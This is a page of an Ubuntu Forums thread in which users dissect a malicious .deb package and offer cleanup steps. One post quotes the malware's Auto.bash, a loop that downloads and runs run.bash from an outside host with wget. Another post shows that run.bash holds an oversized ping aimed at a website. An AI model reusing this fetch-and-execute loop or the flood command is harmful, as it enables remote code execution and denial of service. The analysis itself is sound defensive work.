Page 4 of 15 FirstFirst ... 2345614 ... LastLast
Results 31 to 40 of 142

Thread: YOU THERE!! Malicios script installed as a DEB, please read!

  1. #31
    NoaHall is offline Iced Blended Vanilla Crème Ubuntu
    Join Date
    Mar 2009
    Beans
    1,562
    Distro
    Ubuntu 9.10 Karmic Koala

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Thank you for bring this to our intentions. A lesson should be learned - if you install .deb files not from reliable sources(official PPA's), don't be surprised if it causes damage. Fortunately, this is a fairly low end attack(for you the user) - they could have done much worse. However, this is a attack on websites commonly used on Windows, otherwise known as DDoS attacks. They bring websites to a halt, so from a website owners view, these are dangerous attacks.

    Anyway, I hope this problem has been sorted for you. Perhaps you should consider setting up a firewall - to monitor activity, if nothing else.

  2. #32
    Join Date
    Jun 2007
    Location
    Waikikamukau, New Zealand
    Beans
    Hidden!
    Distro
    Ubuntu

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Quote Originally Posted by pbrane View Post
    This is the contents of the Auto.bash script.

    Code:
    while :
    do
    rm /usr/bin/run.bash
    cd /usr/bin/
    wget http://05748.t35.com/Bots/index.php
    wget http://05748.t35.com/Bots/run.bash
    sleep 4
    rm index.php
    chmod 755 run.bash
    command -p /usr/bin/run.bash
    done
    you may want to se if run.bash is running. if so kill it. And then remove it from /usr/bin/

    gnome.sh runs Auto.bash

    Also you can whois mmowned.com and complain to the hosting company. Interesting I just looked up the hosting company and they advertise protection against DOS attacks.
    I've highlighted in red the part of the script which caught my attention. Anyone checked what would actually get downloaded via wget?
    Forum DOs and DON'Ts
    Never assume that information you find using a search engine is up-to-date.

  3. #33
    Join Date
    Dec 2007
    Location
    The last place I look
    Beans
    Hidden!
    Distro
    Ubuntu 10.04 Lucid Lynx

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Quote Originally Posted by conorsulli View Post
    http://www.mmowned.com/forums/wow-scams/228194-wow-phishing-pack.html

    Look here guys

    Turns out it is a WoW fanboy... most important thing is to get the identity of this person and pull down the file

    he refers to the link in here.. of http://05748.t35.com/ script thing
    that is a very interesting thread. the very definition of script kiddies.

    it appears that the guy is giving out phishing impersonation pages, and telling folks to host them on t35 and 110mb. my guess is that this script is designed to show one of the phishing pages when the user calls up a specific url (probably that index.php file that is downloaded via the auto.bash script). the gnome.sh just launches it at boot.

    my guess is that the ping is designed to somehow boost the phishers reputation on the mmowned forums.
    Last edited by dmizer; December 9th, 2009 at 02:14 AM. Reason: removed quoted hyperlink

  4. #34
    NoaHall is offline Iced Blended Vanilla Crème Ubuntu
    Join Date
    Mar 2009
    Beans
    1,562
    Distro
    Ubuntu 9.10 Karmic Koala

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Yes -


    Php file -
    Code:
    <!-- T35 Hosting Ad Code Begin --> 
    <style type="text/css"> 
    #t35ad{font: 14px  arial,helvetica; text-decoration: none; line-height:1.5em; text-align: center; }
    #t35ad a{font: 14px  arial,helvetica; text-decoration: none; }
    #t35ad a:hover{background-color: black; color: white; font-size:medium; font-weight: bold; }
    #t35ad ul{display: inline; list-style-type: none; padding: 0;}
    #navlist li{display: inline; list-style-type: none; padding-right: 0px; padding-left: 0px; padding: 0;}
    </style> 
    <script type="text/javascript" charset="utf-8"> 
      var redvase_ad = { version: 1.5 };
      redvase_ad.publisher = 't35';
      redvase_ad.kind      = 't35_footer_prem';
      redvase_ad.content   = 'creative'
      </script> 
    <script src="http://redvase.bravenet.com/javascripts/redvase.js" type="text/javascript" charset="utf-8"></script> 
    <!-- T35 Hosting Ad Code End --> 
     
    </noscript></noframes> 
    <!-- T35 Hosting Ad Code Begin --> 
    <!-- Start of Stat Code --> 
    <img src="http://c11.statcounter.com/1120767/0/78e6f3a5/1/" width="1" height="1" alt="stats" border="0" /> 
    <script type="text/javascript"> 
    _qoptions={
    qacct:"p-f2Rp-GHnsAESA"
    };
    </script><script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script> 
    <noscript><img src="http://pixel.quantserve.com/pixel/p-f2Rp-GHnsAESA.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/></noscript> 
    <!-- End of Stat Code --> 
    <div id="t35ad" align="center" style="display:block;"> 
    <br/>Hosted by <a target="_blank" href="http://www.t35.com/">T35 Free Web Hosting</a>.
    <a target=_blank href=http://www.saharamakeup.co.uk/>Indian Bridal Makeup</a>&nbsp;-&nbsp;<a target=_blank href=http://www.hypercasinos.com/component/option,com_jreviews/Itemid,28/>Casino Reviews</a>&nbsp;-&nbsp;<a target=_blank href=http://www.www.mckennavw.com/>VW Los Angeles</a>&nbsp;-&nbsp;<a target="_blank" href="http://www.drugrehabcenter.com/">Drug Rehab</a>&nbsp;-&nbsp;<a target=_blank href=http://www.bestonlinecollegesdegrees.com/college-degrees-online.html>Online Degree</a>&nbsp;-&nbsp;<a target=_blank href=http://www.uk-cheapest.co.uk>Domains</a>&nbsp;-&nbsp;<a target=_blank href=http://www.fashiondrops.com/>Prada Shoes</a>&nbsp;-&nbsp;<a target=_blank href=http://www.thelabdesign.com/organic-seo.html>SEO Los Angeles</a> 
    </div>
    And
    Bash-
    Code:
    ping -s 65507 www.mmowned.com

  5. #35
    Join Date
    Dec 2007
    Location
    The last place I look
    Beans
    Hidden!
    Distro
    Ubuntu 10.04 Lucid Lynx

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Quote Originally Posted by lisati View Post
    I've highlighted in red the part of the script which caught my attention. Anyone checked what would actually get downloaded via wget?
    the run.bash is pretty minimal (just a ping, albeit a large one), but I haven't been able to get a look at the php file without rendering it. I'm pretty sure that it is a phishing knock-off site.

    EditL:
    @Noa, it looks like your noscripts removed a crucial part of the page. all that is there is advertising links, and a call to a javascript for alexa and quantserv.
    Last edited by doas777; December 8th, 2009 at 09:36 PM.

  6. #36
    Join Date
    Dec 2007
    Beans
    124

    Cool Re: YOU THERE!! Malicios script installed as a DEB, please read!

    what Im worried about is the rm commands, it suggests that these containers were in use already!

    to be sure could someone who has not installed the rogue deb check if these files exist already? the could be needed for something


  7. #37
    Join Date
    Oct 2006
    Location
    New York
    Beans
    1,118
    Distro
    Xubuntu 12.10 Quantal Quetzal

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    For me (not silly enough to hand out root): "ls /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh"
    returns
    ls: cannot access /usr/bin/Auto.bash: No such file or directory
    ls: cannot access /usr/bin/run.bash: No such file or directory
    ls: cannot access /etc/profile.d/gnome.sh: No such file or directory

    You should be good getting rid of all of them.

    To remove bad files:
    "rm /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh"
    xubuntu minimal, extensive experience, lshw: http://goo.gl/qCCtn
    blog: http://goo.gl/yLg78
    Linux viruses: http://goo.gl/6OCKA

  8. #38
    Join Date
    Dec 2007
    Location
    The last place I look
    Beans
    Hidden!
    Distro
    Ubuntu 10.04 Lucid Lynx

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Quote Originally Posted by conorsulli View Post
    what Im worried about is the rm commands, it suggests that these containers were in use already!

    to be sure could someone who has not installed the rogue deb check if these files exist already? the could be needed for something

    probably not.
    it's pretty standard whenever you create a file that might already exists, to remove the original first. if there is no file to remove, it succeeds without error, but if it is there, it clears the way for the new version.

    whenever I write a sql create script, I always start by checking for the existing object, and removing it prior to running the create. it's easier than packaging it as one create script and another alter one.

  9. #39
    Join Date
    May 2008
    Beans
    Hidden!

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Quote Originally Posted by doas777 View Post
    EditL:
    @Noa, it looks like your noscripts removed a crucial part of the page. all that is there is advertising links, and a call to a javascript for alexa and quantserv.
    I downloaded it with wget; it looks the same.

    Quote Originally Posted by conorsulli View Post
    what Im worried about is the rm commands, it suggests that these containers were in use already!

    to be sure could someone who has not installed the rogue deb check if these files exist already? the could be needed for something

    None of these filenames are used anywhere else. I think it's just a sanity check, or maybe so it can be updated.

  10. #40
    Join Date
    Dec 2007
    Location
    Gainesville, Florida
    Beans
    Hidden!
    Distro
    Xubuntu 12.04 Precise Pangolin

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    They don't exist on my machine. checked that earlier.

Page 4 of 15 FirstFirst ... 2345614 ... LastLast

Tags for this Thread

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •